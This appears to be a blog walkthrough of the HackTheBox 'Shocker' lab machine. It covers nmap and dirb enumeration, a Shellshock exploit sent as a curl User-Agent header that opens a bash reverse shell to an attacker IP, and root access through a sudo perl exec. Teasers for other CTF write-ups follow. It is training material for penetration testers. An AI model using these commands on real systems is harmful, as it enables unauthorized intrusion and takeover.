Skip to main content

HTB SHOCKER WALK-THROUGH


HackTheBox is an excellent platform for various pen-testers to increase their testing skills and knowledge.
Machine Level -Easy
Machine Name -Shocker
Machine OS -Linux
Machine IP -10.10.10.56
Tools:
Nmap -Nmap is a fantastic tools for scanning the open ports, services and OS detection. You can use other tools other than nmap (which ever you are more comfortable with ) like masscan, SPARTA etc to scan for open ports.
Method:
Scanning the machine is the first step(i.e. Enumeration).
Use the command sudo nmap -sSVS 10.10.10.56, this will scan for open ports and services on the host.
Only two ports open on the machine.
Let's start the enumeration with visiting the victims IP address.
Just an image saying "Don't Bug Me!"
Nothing much to enumerate here.
Let's do some directory busting.
Use the command dirb http://10.10.10.56/
Nothing useful except for this cgi-bin
I you don't know what cgi-bin, here's the answer.
"A CGI-bin is a folder used to house scripts that will interact with a Web browser to provide functionality for a Web page or website. Common Gateway Interface (CGI) is a resource for accommodating the use of scripts in Web design. As scripts are sent from a server to a Web browser, the CGI-bin is often referenced in a url." -Techopedia
As the name of the box is Shocker, it rang a bell, Shellshock vulnerability.
Just to confirm I went ahead with one more round of directory busting using dirbuster tool to look for files with extensions sh,html and php
I found a user.sh file. Confirmed.
The motive of the box is to exploit the Shellshock vulnerability and gain a user shell.
I found a Shellshock exploit that works perfectly fine with this machine and gives us a reverse shell.
(if u get error while using the command regarding brackets, use double quotes instead of single quotes and it should work perfectly fine)
Command is
curl -H 'User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.3/4488 0>&1' http://10.10.10.56:80/cgi-bin/user.sh
(4488 is a listening port so before launching it open up a netcat listening port on 4488)
For listening port use the command
nc -nlvp 4488
After you launch the exploit, you should get a shell.
We are shelly user.
Let's just quickly grab the user flag and go for privilege escalation.
We got the user flag.
Now, for privilege escalation:
Use the command sudo -l to see if we can run any file as root that needs no password.
We can run perl as root.
That's, bingo.
Use the command
sudo perl -e 'exec "/bin/sh"'
This command lets you run the perl as root and get a privileged shell.
As you can see we are root now.
Let's grab the root flag.
That's all for this machine.

Take-back ->Shellshock vulnerability led to getting a reverse shell on this machine.

Thanks for reading !

Comments

Post a Comment

Popular posts from this blog

VULNHUB INFOSEC PREP : OSCP

Welcome to the walkthrough of InfoSec Prep: OSCP walkthrough. It is a beginner-level boot2root machine and it can be downloaded from  here . I cracked this machine literally 5 minutes after it booted properly. So you can consider this machine the easiest.  Hint: Nmap Finding secret.txt and decoding it. Login via ssh. Privilege escalation to root via SUID binary.  Boot up the machine and it should show the IP address. We start off by pinging the box to verify that the box is up and running and we can reach out to it. Command: ping <IP> Then we can run Nmap scan to look for open ports and services running on the box. We will use -sC for running default scripts, -sV for Version/Service info and -T4 for faster execution, and -o for saving the result on a file named nmap The command is: sudo nmap -sC -sV -T4 <IP> -o filename Looking at the scan results, port 22 is open and running ssh, and port 80 is open, and it's running Apache. We can also see a directory named ...
Post a Comment
Read more

Beginners Code Review Part 1

  Image credits to  Leobit This is a walkthrough of an exercise created by  PentesterLab  as a free course for learning beginner-friendly source code review. The link to the source code is here . Either clone it or download it as a zip locally. As instructed in the exercise we won't run the run, just read through the source code and look for possible weaknesses that we can leverage into vulnerabilities. LIST OF WEAKNESSES You can find below the list of issues present in the application: Hardcoded credentials or secrets Information leak Missing security flags Weak password hashing mechanism Cross-Site Scripting No CSRF protection Directory Listing Crypto issue Signature bypass Authentication bypass Authorization bypass Remote Code Execution Hand-On Findings and Objectives * Hardcoded credentials or secrets      ...
Post a Comment
Read more

KIOPTRIX LEVEL 1 WALKTHROUGH WITH AND WITHOUT METASPLOIT

Kioptrix Level 1 is a beginner level CTF challenge. You can download this virtual machine from here .  Details of Kioptrix : Size----186 MB OS---Linux Note: In virtual box, set up a Bridged network (virtual box -> preferences -> network) in networking, put both your Kali and Kioptrix to Bridged network. Fire-up both the machines(Kali and Kioptrix Level 1) Kioptrix will ask for the logins which we don't know at the moment. This also means we can't find IP of the Kioptrix directly from the Kioptrix machine itself. Leave the Kioptrix machine as it is and switch to Kali. First we need to find the IP address of the Kioptrix machine. We will use the tool netdiscover that comes pre-installed in Kali Linux to identify the IP address. Command   sudo netdiscover -i eth0 Wait  for scan results. 192.168.233.130 seems to be the IP of the Kioptrix machine. Let's scan this IP address using the tool Nmap (scan will also verify that its the IP of Kioptrix machine) Command  su...
1 comment
Read more